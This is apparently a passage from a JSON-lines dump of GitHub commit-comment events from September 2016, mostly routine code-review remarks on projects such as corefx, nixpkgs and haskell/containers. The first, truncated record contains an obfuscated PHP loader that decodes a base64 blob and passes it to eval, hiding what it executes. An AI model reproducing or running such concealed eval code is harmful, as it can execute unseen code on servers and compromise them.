0RLck94YnNaZE5UNUdjYU12TlArWUtJMXRwWnpucDNVVGJYcFlZSmljU\r\n2FVQ3pmOUNzSnp0U3lEeUdJTHV0VzA3UWRxSmZ3b1dYKzZDeDRNRTRrTTVROUp0WWhVK2pWN2c4aFBhLytkT0\r\nVZOG8vc2g3bEdUTW8xcnk2ZzBDbDRhNlBmNkZWRzI2U3p2Mm5uTGFPNFpJbGRUOC9obFVPS1gyaUtXQVpEZVE\r\nxelVuSDRVVjE4S0lyQ29kL3cremlvcllOSW8vclZDRmZsYk5ZY2JhQ21KWkJMeUJQbGk5OXMrWHpuZVBYcUlp\r\nalE4WUw4MkloODZxbXhOK21OOW9tc0Z2Z3BuMzdaaHU0emhyeHROZEcydHM3S3R4RkhzbmhEVnNSZDdJM1dBW\r\nThPNHZkQXk5M0E5ajkzODZmeFQrQm1CaStYVUtlK1RTaXg2UHlOOGV3RmlMWUQ4TmdoSkxOL1BCTW9oRDdFKz\r\nJ3R3UrRm4vb1lnbmRXc2JFektiODFjWVFpV0o5U0Y5VWJsZEpESzhXSWg0QmZGeXRXNjR5RUJ6ZlBGeHVLdS9\r\nMVS9ZRHhDRllDVWZLVFdiVm1ZZDZkRlJYVWluUit3L1FvVjBTdElZdndpTVRzeVlZd3V0VHlXV0Y3U3pGVUJk\r\ndko3S25hajhwQjU3MHFiS0dnNUQyWjVTVit2dEc5K3Y3TjgvYXdqc2ZTWjR0MDlqdTJsbytuc0FVSzE1cWZGb\r\n29WaHZkWVAyZ0lSVzRUSzBmUGp6TTlXcVF4ZEZoaWdUNGEwSXVieUVYSHJvR01EYlVMTDh0TnpDQ3FyVkJ3UT\r\nJBN3ZKUkJlYVNoYjUzY0FnY1lXZkNYdkNOanZWQ1k5SFZmcmczWXZQWnVHajVHNUxEa3RnNlg3aFk1cVU1dkQ\r\n0MnNHcWllaWREZ2N6ZmJwNTJra2tNMllxQnhhVmdUN2t1cEdnai9ZbFVOQk0vcEZPYTc0Q3hYMFpCNHFZOEs0\r\nSDJaTmtXbWxwbFRvOVgwOWcwNDlmbXJydFhJTlQzZ2g2RnIwN0hKQkd5VFRsU1BBRlZabjFTaXZRN0lkWEZjT\r\nzFBWDJKeTlMdGxza1ArYUhROUMxUUlBMTRpVytmSVZkLytpVGRxOEhCc05RbXlnN2hZYU1LQTZ1aVkvOUxoSX\r\nNLT01CT1BrUVNnMHpsdlJYa3QyM0F1dzdKTFc2SlBjUDBhOEY0MTVRY0VEQnhiSTR0cUU3VHRDYk5iWTlpYjF\r\nQdmVpcmt3d1M1bTFxTThFdkljTnd3VTB2SHYzRW80WTJCVFAxQ0pCbnNYYkJ6eDRKemwreGRxVzN0THdrZGU0\r\nZlc1Yy80MStyOGtDYUZBdFFKVGF3TmlMUzdlMVVQckxJaGpKZU5DMWZCZlcxNGlEbHN4dTYvbzN0SXVhSTlxS\r\n3lsaFpQK3UveVk5QmlHZ3JRc3h2dnIrZXNJUW1ONUcydXkyR3hBOStERE50MTRiVlhFcVhIZmlhYmJKZWVXdm\r\ntINmFkR0I2RlNKVkJ1OXNLVGhIMlk1LzkzbDUwbEVOd054SDFpMUdOYTY5L1lac3h2eVhEM2k2ZDByKzJ4VU9\r\nwZ1MwdHZubzRweGZlOVBCTDRGQTkyTmhBcDNVemJtYzBEdnpaaFhUa0p6SlZpRURHK3l3dlNEdWVLZGdKL3Jr\r\neVdvc2pIczRaTnNndDZvYmxSZ2RZbDFLVVpMTDY0czhCNmRhREFnUFN1YXhLdGpPY1h2bHYyRktCOWwzUFhyS\r\nDM0bHVGTzJrOXZkeEpZbTd1bFQ0OEMyMnhlRHZ0NDdoVjQ4b05yRW1HaUhjSEJnUmhRMHFsbitzR25BbWRLVn\r\nE1cTVHRzI1dllvQktnVUpadmMyaDJ0LzJucXhFOTJBMHZQdDVWZFNqdks4di9GRzRGYkVpTnU5ZWp6RmowOWd\r\nIbUEwdGUwNmZXU2krdzBScUcvcnAyaFRsaHVJRDV5THJuL0ppamhwcVlaM0R5a28xZ0RWbklEVWs3blByZUNR\r\nR05iZkkxU3BaTVg2alNhU1NFQWwxM1M4YjB6S2dwZlNKY2FjcFYzNnBmZjdtMXdzcDBBQ2dtQlh2cjg5eXdFU\r\n1IvSCtnUUJXZVovL2JYLzkreC8vKys5Ly92ZC8nKSkpKTsgPz4NCg==';eval(base64_decode('JF9YPWJh\r\nc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SP\r\nWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw\r\n=='));?>"}},"created_at":"2016-09-13T19:11:00Z"}
{"id":"4557654222","type":"CommitCommentEvent","actor":{"login":"arhq315"},"repo":{"name":"VisionWebSoft/tlr"},"payload":{"comment":{"id":19007122,"position":null,"line":null,"path":null,"commit_id":"1aec5e62eee6fc9c3a383d979d8abe0d73ca6665","created_at":"2016-09-13T19:11:37Z","updated_at":"2016-09-13T19:11:37Z","body":"This file separates the wordModule code into config, input, logic, and output. The logic is completely independent of the DOM in case the implementation changes. The goal of this module is to take user input from a form field and generate a live preview of the order as a bullet point list. When the user is done, it will clear the form, hide the modal and send a JSON object containing the order information.\r\n\r\nSome of the code more complicated than it otherwise could have been out of concern for older browsers. XHR was used instead of fetch() and loops were used instead of array.filter() and array.forEach()."}},"created_at":"2016-09-13T19:11:37Z"}
{"id":"4557654479","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007123,"position":5,"line":61,"path":"src/System.IO.Compression/tests/System.IO.Compression.Tests.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:11:37Z","updated_at":"2016-09-13T19:11:37Z","body":"That's odd, It looks to me like 1.04 should be additive: https://github.com/dotnet/corefx-testdata/commit/fa78596a68610034766de8ecc994bef9b8c6763d\r\n\r\nAlso, I'd expect this to have broken the tests Ian added.\r\n\r\nPerhaps you just need to double-check that the version in the CSProj matches that in the project.json?\r\nhttps://github.com/dotnet/corefx/commit/ed8347041878054db7707d54201779ccba967782#diff-e5c1f021444f8aeb8fbf83367c16b614R8\r\n\r\n/cc @ianhays "}},"created_at":"2016-09-13T19:11:37Z"}
{"id":"4557654338","type":"CommitCommentEvent","actor":{"login":"gereeter"},"repo":{"name":"haskell/containers"},"payload":{"comment":{"id":19007124,"position":18,"line":1129,"path":"Data/IntMap/Lazy.hs","commit_id":"1de0fedc47210ee44b43f9e78e4d25b516bd8d63","created_at":"2016-09-13T19:11:38Z","updated_at":"2016-09-13T19:11:38Z","body":"I thought of that and thought it would be slower. However, actually benchmarking:\r\n\r\nWith `ScopedTypeVariables`:\r\n```\r\nbenchmarking mapWithKey\r\ntime                 162.5 μs   (162.3 μs .. 162.6 μs)\r\n                     1.000 R²   (1.000 R² .. 1.000 R²)\r\nmean                 162.5 μs   (162.4 μs .. 162.7 μs)\r\nstd dev              435.6 ns   (339.8 ns .. 563.4 ns)\r\n```\r\n\r\nWith duplication:\r\n```\r\nbenchmarking mapWithKey\r\ntime                 167.5 μs   (167.2 μs .. 167.8 μs)\r\n                     1.000 R²   (1.000 R² .. 1.000 R²)\r\nmean                 167.2 μs   (167.0 μs .. 167.4 μs)\r\nstd dev              579.6 ns   (472.7 ns .. 769.2 ns)\r\n```\r\n\r\nWith your suggestion, passing around the function:\r\n```\r\nbenchmarking mapWithKey\r\ntime                 157.6 μs   (157.2 μs .. 158.0 μs)\r\n                     1.000 R²   (1.000 R² .. 1.000 R²)\r\nmean                 156.8 μs   (156.3 μs .. 157.2 μs)\r\nstd dev              1.555 μs   (1.352 μs .. 1.816 μs)\r\n```\r\n\r\nI think I'll go with your suggestion."}},"created_at":"2016-09-13T19:11:38Z"}
{"id":"4557655950","type":"CommitCommentEvent","actor":{"login":"droazen"},"repo":{"name":"broadinstitute/gatk"},"payload":{"comment":{"id":19007129,"position":34,"line":124,"path":"src/main/java/org/broadinstitute/hellbender/tools/IndexFeatureFile.java","commit_id":"3aa516651ecb4e305137ce5d3f638274948c5320","created_at":"2016-09-13T19:11:56Z","updated_at":"2016-09-13T19:11:56Z","body":"No one is making anyone move to a new extension, don't worry -- it's just a mistake. Feel free to submit a patch!  :)"}},"created_at":"2016-09-13T19:11:56Z"}
{"id":"4557659279","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"chriswininger/Derp-Learning"},"payload":{"comment":{"id":19007141,"position":null,"line":null,"path":null,"commit_id":"4e342f40745019a67b9589cd2a6405cc3779f9bf","created_at":"2016-09-13T19:12:35Z","updated_at":"2016-09-13T19:12:35Z","body":"Typo ;)"}},"created_at":"2016-09-13T19:12:35Z"}
{"id":"4557659808","type":"CommitCommentEvent","actor":{"login":"prk327"},"repo":{"name":"prk327/AtConP"},"payload":{"comment":{"id":19007143,"position":null,"line":null,"path":null,"commit_id":"5052be7402e6cfb2e96feef4551e98d0509b9223","created_at":"2016-09-13T19:12:41Z","updated_at":"2016-09-13T19:12:41Z","body":"@### ****"}},"created_at":"2016-09-13T19:12:41Z"}
{"id":"4557665088","type":"CommitCommentEvent","actor":{"login":"Cyclodex"},"repo":{"name":"Cyclodex/cyclone"},"payload":{"comment":{"id":19007155,"position":null,"line":null,"path":null,"commit_id":"de215468ceef95b250d00ff486b8698a37387617","created_at":"2016-09-13T19:13:41Z","updated_at":"2016-09-13T19:13:41Z","body":"I prepared the DB in JSON to match the new setup. Ready for migration. Lets first merge the branch."}},"created_at":"2016-09-13T19:13:41Z"}
{"id":"4557665966","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007160,"position":4,"line":5,"path":"src/System.Private.Xml/src/System/Xml/Schema/XmlSchema.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:13:50Z","updated_at":"2016-09-13T19:13:50Z","body":"I see.  Consider grouping these XML fixes in a separate commit with a link to original commit."}},"created_at":"2016-09-13T19:13:50Z"}
{"id":"4557666178","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19007162,"position":null,"line":null,"path":null,"commit_id":"7b9d3f860588c5157ec9cb2a325e9e16a2ab6e17","created_at":"2016-09-13T19:13:54Z","updated_at":"2016-09-13T19:13:54Z","body":"This breaks clang build on Linux, as `set-xcode-analyzer` doesn't exist there."}},"created_at":"2016-09-13T19:13:54Z"}
{"id":"4557667036","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007167,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:14:03Z","updated_at":"2016-09-13T19:14:03Z","body":"In dev/api we added a build for uap101aot which requires this in order to find the `PureAttribute` type."}},"created_at":"2016-09-13T19:14:03Z"}
{"id":"4557670824","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19007178,"position":null,"line":null,"path":null,"commit_id":"7b9d3f860588c5157ec9cb2a325e9e16a2ab6e17","created_at":"2016-09-13T19:14:41Z","updated_at":"2016-09-13T19:14:41Z","body":"Whoops, will fix later if nobody gets to it first, sorry!"}},"created_at":"2016-09-13T19:14:41Z"}
{"id":"4557671133","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19007179,"position":37,"line":117,"path":"components/patient-data/impl/src/main/java/org/phenotips/data/internal/controller/APGARController.java","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T19:14:44Z","updated_at":"2016-09-13T19:14:44Z","body":"..actually, i was wrong. Try-catch in PhenotipsPatient.java should catch those. So disregard this"}},"created_at":"2016-09-13T19:14:44Z"}
{"id":"4557671316","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"haskell/containers"},"payload":{"comment":{"id":19007181,"position":18,"line":1129,"path":"Data/IntMap/Lazy.hs","commit_id":"1de0fedc47210ee44b43f9e78e4d25b516bd8d63","created_at":"2016-09-13T19:14:45Z","updated_at":"2016-09-13T19:14:45Z","body":"I'm not surprised. The paper on the constant argument transformation\nindicated it was only a good idea when at least two constant arguments\ncould be pulled out. I still haven't had a chance to actually read your\ncode (I'm a bit sick today). Could you give me a sense of why some fold\nvariants might be challenging?\n\nOn Sep 13, 2016 3:11 PM, \"Jonathan S\" <notifications@github.com> wrote:\n\n> I thought of that and thought it would be slower. However, actually\n> benchmarking:\n>\n> With ScopedTypeVariables:\n>\n> benchmarking mapWithKey\n> time                 162.5 μs   (162.3 μs .. 162.6 μs)\n>                      1.000 R²   (1.000 R² .. 1.000 R²)\n> mean                 162.5 μs   (162.4 μs .. 162.7 μs)\n> std dev              435.6 ns   (339.8 ns .. 563.4 ns)\n>\n> With duplication:\n>\n> benchmarking mapWithKey\n> time                 167.5 μs   (167.2 μs .. 167.8 μs)\n>                      1.000 R²   (1.000 R² .. 1.000 R²)\n> mean                 167.2 μs   (167.0 μs .. 167.4 μs)\n> std dev              579.6 ns   (472.7 ns .. 769.2 ns)\n>\n> With your suggestion, passing around the function:\n>\n> benchmarking mapWithKey\n> time                 157.6 μs   (157.2 μs .. 158.0 μs)\n>                      1.000 R²   (1.000 R² .. 1.000 R²)\n> mean                 156.8 μs   (156.3 μs .. 157.2 μs)\n> std dev              1.555 μs   (1.352 μs .. 1.816 μs)\n>\n> I think I'll go with your suggestion.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/haskell/containers/commit/1de0fedc47210ee44b43f9e78e4d25b516bd8d63#commitcomment-19007124>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABzi_dhzRbML0F9O2DVwW1Yek0eM6GiUks5qpvVrgaJpZM4J742T>\n> .\n>\n"}},"created_at":"2016-09-13T19:14:45Z"}
{"id":"4557674036","type":"CommitCommentEvent","actor":{"login":"marcshilling"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19007187,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-13T19:15:15Z","updated_at":"2016-09-13T19:15:15Z","body":"@cbrevik not required (because the old signature is still defined as deprecated), but I went ahead and did it to prevent issues after it eventually goes away. Tested on both 33 and 32 and it works great."}},"created_at":"2016-09-13T19:15:15Z"}
{"id":"4557676186","type":"CommitCommentEvent","actor":{"login":"loumrebelo"},"repo":{"name":"loumrebelo/github-101"},"payload":{"comment":{"id":19007194,"position":3,"line":3,"path":"README.md","commit_id":"117e9f6a689c017a77366dc2a369641c5619a007","created_at":"2016-09-13T19:15:41Z","updated_at":"2016-09-13T19:15:41Z","body":"Inline comment, this look awesome but double it"}},"created_at":"2016-09-13T19:15:41Z"}
{"id":"4557683296","type":"CommitCommentEvent","actor":{"login":"primaeval"},"repo":{"name":"iainsmacleod/script.tvguide.fullscreen"},"payload":{"comment":{"id":19007215,"position":null,"line":null,"path":null,"commit_id":"5451ca07d069f25aa2dc4a5330887f8f8bbe3ef7","created_at":"2016-09-13T19:17:01Z","updated_at":"2016-09-13T19:17:01Z","body":"It was just background at first I think. It is black.png in Default. I can't remember exactly but there are several textures that look like they aren't necessary but actually stop the desktop poking through the epg and stop things flashing when you change page or press fullscreen. I have fallen for the trap of thinking they are unnecessary too, taking them out and then finding a bug later on.\r\nThe skindefault.jpg fails in jarvis confluence so I had to take it out. \r\nI had to make the autoplay and autoplaywith textures different colours too."}},"created_at":"2016-09-13T19:17:01Z"}
{"id":"4557684035","type":"CommitCommentEvent","actor":{"login":"inthedark122"},"repo":{"name":"AlyabyshevSam/react-redux-weather"},"payload":{"comment":{"id":19007217,"position":14,"line":14,"path":"src/actions/index.js","commit_id":"3246df7847928bbbc2129345289a6939a5591d00","created_at":"2016-09-13T19:17:11Z","updated_at":"2016-09-13T19:17:11Z","body":"export removeLocation = (id) => ({\r\n     type: Action.REMOVE_LOCATION,\r\n     id\r\n });"}},"created_at":"2016-09-13T19:17:11Z"}
{"id":"4557687556","type":"CommitCommentEvent","actor":{"login":"NeatElves"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19007224,"position":null,"line":null,"path":null,"commit_id":"36c1592e055f6e45357b968e64b2e7b5c5ef0e70","created_at":"2016-09-13T19:17:49Z","updated_at":"2016-09-13T19:17:49Z","body":"Error GUID -> script  InstallFullDB.sh  falls"}},"created_at":"2016-09-13T19:17:49Z"}
{"id":"4557697078","type":"CommitCommentEvent","actor":{"login":"creesch"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19007239,"position":null,"line":null,"path":null,"commit_id":"f74a6740ecdd5971adda6b8ceaa46b7635ce0dc6","created_at":"2016-09-13T19:19:40Z","updated_at":"2016-09-13T19:19:40Z","body":"this breaks the background page"}},"created_at":"2016-09-13T19:19:40Z"}
{"id":"4557704439","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19007259,"position":33,"line":125,"path":"desktop/src/com/frostwire/gui/updates/UpdateMediator.java","commit_id":"3c7dc7dd2e567ff058feec08f420ad43b932dae6","created_at":"2016-09-13T19:21:06Z","updated_at":"2016-09-13T19:21:06Z","body":"can't believe this :D"}},"created_at":"2016-09-13T19:21:06Z"}
{"id":"4557706129","type":"CommitCommentEvent","actor":{"login":"serge-v"},"repo":{"name":"Masterminds/glide"},"payload":{"comment":{"id":19007264,"position":7,"line":19,"path":"docs/index.md","commit_id":"5d15090478dfe777a86f627b26efb1584ed12f17","created_at":"2016-09-13T19:21:24Z","updated_at":"2016-09-13T19:21:24Z","body":"this script gives an error: \"sh: 61: [[: not found\" because it is using '[[' and shebang is '/bin/sh'"}},"created_at":"2016-09-13T19:21:24Z"}
{"id":"4557718068","type":"CommitCommentEvent","actor":{"login":"serge-v"},"repo":{"name":"Masterminds/glide.sh"},"payload":{"comment":{"id":19007279,"position":12,"line":58,"path":"get","commit_id":"14884b95be1c6736c8fb24b2cfe7529d899e5299","created_at":"2016-09-13T19:23:45Z","updated_at":"2016-09-13T19:23:45Z","body":"double brackets give an error in sh."}},"created_at":"2016-09-13T19:23:45Z"}
{"id":"4557726801","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007299,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:25:22Z","updated_at":"2016-09-13T19:25:22Z","body":"I see, looks like @benaadams broke this with https://github.com/dotnet/corefx/commit/3c0e84832d9cd0a97c11dd8658722f69b6b1bc8e."}},"created_at":"2016-09-13T19:25:22Z"}
{"id":"4557728033","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19007300,"position":33,"line":125,"path":"desktop/src/com/frostwire/gui/updates/UpdateMediator.java","commit_id":"3c7dc7dd2e567ff058feec08f420ad43b932dae6","created_at":"2016-09-13T19:25:37Z","updated_at":"2016-09-13T19:25:37Z","body":"I still have hopes for a fast external drive, I think the demand is still there for a portable version."}},"created_at":"2016-09-13T19:25:37Z"}
{"id":"4557733136","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":19007308,"position":120,"line":491,"path":"pom.xml","commit_id":"73acd97a1d78fb643057c6f78d9915578862630d","created_at":"2016-09-13T19:26:36Z","updated_at":"2016-09-13T19:26:36Z","body":"Nice. That's simpler than a `repository` element. Didn't know you could do that."}},"created_at":"2016-09-13T19:26:36Z"}
{"id":"4557737162","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19007316,"position":33,"line":131,"path":"youtube_dl/extractor/adobepass.py","commit_id":"7e60ce9cf7b104c15fcc4c495166dc57b950b987","created_at":"2016-09-13T19:27:21Z","updated_at":"2016-09-13T19:27:21Z","body":"also another case is a change of the ip."}},"created_at":"2016-09-13T19:27:21Z"}
{"id":"4557746359","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19007337,"position":4,"line":393,"path":"routes/v1.js","commit_id":"c9302d6cf08dc15a648f91a9ada885cffb4fdde6","created_at":"2016-09-13T19:29:10Z","updated_at":"2016-09-13T19:29:10Z","body":"Attention, je pense qu'il manque la gestion du cas où le reverse proxy est désactivé \r\nhttps://github.com/Inist-CNRS/ezmaster/blob/master/helpers/instances.js#L143-L150\r\n\r\nAprès je me pose aussi des questions sur le nommage pour éviter les ambiguités (publicURL vs publicDomain ... )"}},"created_at":"2016-09-13T19:29:10Z"}
{"id":"4557747438","type":"CommitCommentEvent","actor":{"login":"cjh1"},"repo":{"name":"OpenChemistry/tomviz"},"payload":{"comment":{"id":19007342,"position":null,"line":null,"path":null,"commit_id":"93144e668b8997a7dce36790e7b8b3f5dd20e8b5","created_at":"2016-09-13T19:29:21Z","updated_at":"2016-09-13T19:29:21Z","body":"@cquammen I think the actual issue here is [this line](https://github.com/OpenChemistry/tomviz/blob/master/tomviz/OperatorPython.cxx#L274). toLatin1() returns a QByteArray and we are not taking any references to it so will be freed, thus data() will return a pointer to garbage. I bet if you change that line to something like this:\r\n\r\n```\r\nQByteArray byteAray = m_resultNames[i];\r\nconst char *name =  bytesArray.data();\r\n```"}},"created_at":"2016-09-13T19:29:21Z"}
{"id":"4557748816","type":"CommitCommentEvent","actor":{"login":"nachtgeist"},"repo":{"name":"nachtgeist/testssl.sh"},"payload":{"comment":{"id":19007345,"position":null,"line":null,"path":null,"commit_id":"2a926609ca7be7befff96bafbe6088205c93e730","created_at":"2016-09-13T19:29:38Z","updated_at":"2016-09-13T19:29:38Z","body":"Although technically $NPN_PROTOs is declared readonly and initialized and thus cannot be empty, I also added quotes to that location. Now there are no more locations of unquoted arguments to -nextprotoneg."}},"created_at":"2016-09-13T19:29:38Z"}
{"id":"4557756196","type":"CommitCommentEvent","actor":{"login":"luoser"},"repo":{"name":"breaktheinterweb/breaktheinterweb.github.io"},"payload":{"comment":{"id":19007359,"position":null,"line":null,"path":null,"commit_id":"2bee96c41297c0d07a2cf073a957dc087de730ed","created_at":"2016-09-13T19:31:08Z","updated_at":"2016-09-13T19:31:08Z","body":"nice"}},"created_at":"2016-09-13T19:31:08Z"}
{"id":"4557758016","type":"CommitCommentEvent","actor":{"login":"kofalt"},"repo":{"name":"Masterminds/glide.sh"},"payload":{"comment":{"id":19007364,"position":12,"line":58,"path":"get","commit_id":"14884b95be1c6736c8fb24b2cfe7529d899e5299","created_at":"2016-09-13T19:31:28Z","updated_at":"2016-09-13T19:31:28Z","body":"Good catch. It might be that the MinGW shell I was trying this on uses bash for sh.\r\n\r\nI did that because I wanted to match on a glob - any thoughts on how I would do that in sh?"}},"created_at":"2016-09-13T19:31:28Z"}
{"id":"4557760565","type":"CommitCommentEvent","actor":{"login":"radimj"},"repo":{"name":"radimj/numerology"},"payload":{"comment":{"id":19007373,"position":5,"line":53,"path":"Numerology/ViewController.swift","commit_id":"59b7159571fd264588c659a5196d7f7eac221235","created_at":"2016-09-13T19:31:58Z","updated_at":"2016-09-13T19:31:58Z","body":"Why World ...:)"}},"created_at":"2016-09-13T19:31:58Z"}
{"id":"4557761810","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19007379,"position":null,"line":null,"path":null,"commit_id":"1ce4902684a75d7fb6be951bd91a56a30797c6a6","created_at":"2016-09-13T19:32:13Z","updated_at":"2016-09-13T19:32:13Z","body":"That would be best, just in case the ordering got shuffled. I'll make that change now."}},"created_at":"2016-09-13T19:32:13Z"}
{"id":"4557766228","type":"CommitCommentEvent","actor":{"login":"cjh1"},"repo":{"name":"OpenChemistry/tomviz"},"payload":{"comment":{"id":19007384,"position":null,"line":null,"path":null,"commit_id":"93144e668b8997a7dce36790e7b8b3f5dd20e8b5","created_at":"2016-09-13T19:33:04Z","updated_at":"2016-09-13T19:33:04Z","body":"There seem to be other places we are doing this which we might want to look at."}},"created_at":"2016-09-13T19:33:04Z"}
{"id":"4557768613","type":"CommitCommentEvent","actor":{"login":"ekg"},"repo":{"name":"adamnovak/vg"},"payload":{"comment":{"id":19007390,"position":null,"line":null,"path":null,"commit_id":"8d61ac731f078a8f8b7b3ccff8f193ec1dd05455","created_at":"2016-09-13T19:33:31Z","updated_at":"2016-09-13T19:33:31Z","body":"I don't think we can keep the full translations around. They will keep\nshifting and every shift will have to be recorded in the repository. It is\nenough IMO to verify that the translation looks sane. I guess this can be\ntested too by projecting alignments through it?\n\nOn Tue, Sep 13, 2016, 20:25 adamnovak <notifications@github.com> wrote:\n\n> Change test results for vg mod expected translation\n>\n> @ekg I'm not sure that this is right; a different translation is\n> definitelty being output, with none of the new mappings having any\n> sequences set. But I don't know enough about why the old translations\n> were like they were to really dig in and see if the new results (maybe\n> from a different set of alignments?) are worse.\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/adamnovak/vg/commit/8d61ac731f078a8f8b7b3ccff8f193ec1dd05455\n>\n"}},"created_at":"2016-09-13T19:33:31Z"}
{"id":"4557769745","type":"CommitCommentEvent","actor":{"login":"tfitzmac"},"repo":{"name":"Azure/azure-content"},"payload":{"comment":{"id":19007394,"position":null,"line":null,"path":null,"commit_id":"71438456b9e199488ce0db5778b59eef535cfc48","created_at":"2016-09-13T19:33:44Z","updated_at":"2016-09-13T19:33:44Z","body":"@mikeblakeuk - thanks again for this suggestion, it made me re-evaluate how the script is used. A co-worker of mine contacted the creator of this script and suggested a change (return certificate object). He made that change and loaded a new version to the Script Center. So, I am using that version for now. "}},"created_at":"2016-09-13T19:33:44Z"}
{"id":"4557770680","type":"CommitCommentEvent","actor":{"login":"friedger"},"repo":{"name":"BruGTUG/DevFest2016"},"payload":{"comment":{"id":19007397,"position":null,"line":null,"path":null,"commit_id":"a11ee8bdfda8169d174776f899b733b1e34229a7","created_at":"2016-09-13T19:33:55Z","updated_at":"2016-09-13T19:33:55Z","body":"@pjjjv Does it launch?"}},"created_at":"2016-09-13T19:33:55Z"}
{"id":"4557770964","type":"CommitCommentEvent","actor":{"login":"ericspivey"},"repo":{"name":"LeeKamentsky/python-javabridge"},"payload":{"comment":{"id":19007398,"position":null,"line":null,"path":null,"commit_id":"d51cab26a5df3e2c6d33af129d07b9734b6ff663","created_at":"2016-09-13T19:33:59Z","updated_at":"2016-09-13T19:33:59Z","body":"Hi, I am getting an error on the pip install of javabridge using the most recent version (1.0.14). I am installing it as part of CellProfiler on a Ubuntu 14.04 machine. It is saying I have the numpy import problem that is resolved in Issue 30, I have no idea what I am doing wrong at this point.\r\n[javabridge_problem.txt](https://github.com/LeeKamentsky/python-javabridge/files/470622/javabridge_problem.txt)\r\n\r\n"}},"created_at":"2016-09-13T19:33:59Z"}
{"id":"4557772198","type":"CommitCommentEvent","actor":{"login":"erikdesjardins"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19007403,"position":null,"line":null,"path":null,"commit_id":"f74a6740ecdd5971adda6b8ceaa46b7635ce0dc6","created_at":"2016-09-13T19:34:14Z","updated_at":"2016-09-13T19:34:14Z","body":"FWIW you don't even need a background \"page\" in Chrome, you can refer directly to the script: https://github.com/honestbleeps/Reddit-Enhancement-Suite/blob/ef709b6f6ba7f1081fb70d36b36c6a198b8d9654/chrome/manifest.json#L7-L11"}},"created_at":"2016-09-13T19:34:14Z"}
{"id":"4557773613","type":"CommitCommentEvent","actor":{"login":"DmitriySokhach"},"repo":{"name":"saarixx/HotelExplorer"},"payload":{"comment":{"id":19007407,"position":1,"line":1,"path":"HotelDataCrawler/HotelDataCrawler.cs","commit_id":"8e2ebae58646c1a202d56b8142325647c9bc911d","created_at":"2016-09-13T19:34:30Z","updated_at":"2016-09-13T19:34:30Z","body":"This class has many responsibilities: search by each separate site.\r\nRecommend to split parsers to each other class, combine similar functional if possible."}},"created_at":"2016-09-13T19:34:30Z"}
{"id":"4557776874","type":"CommitCommentEvent","actor":{"login":"pillehu"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19007413,"position":null,"line":null,"path":null,"commit_id":"2183bfaf7386f3ed792a4de79be214ba719e6794","created_at":"2016-09-13T19:35:10Z","updated_at":"2016-09-13T19:35:10Z","body":"I would like to use the theme with screen reader, but it is not accessible for the blind (w3c-wcag). Can anyone help?"}},"created_at":"2016-09-13T19:35:10Z"}
{"id":"4557780356","type":"CommitCommentEvent","actor":{"login":"pillehu"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19007418,"position":null,"line":null,"path":null,"commit_id":"08887ef36c59caa0ae62a939cdd8207d19abb4e6","created_at":"2016-09-13T19:35:49Z","updated_at":"2016-09-13T19:35:49Z","body":"I would like to use the theme with screen reader, but it is not accessible for the blind (w3c-wcag). Can anyone help?"}},"created_at":"2016-09-13T19:35:49Z"}
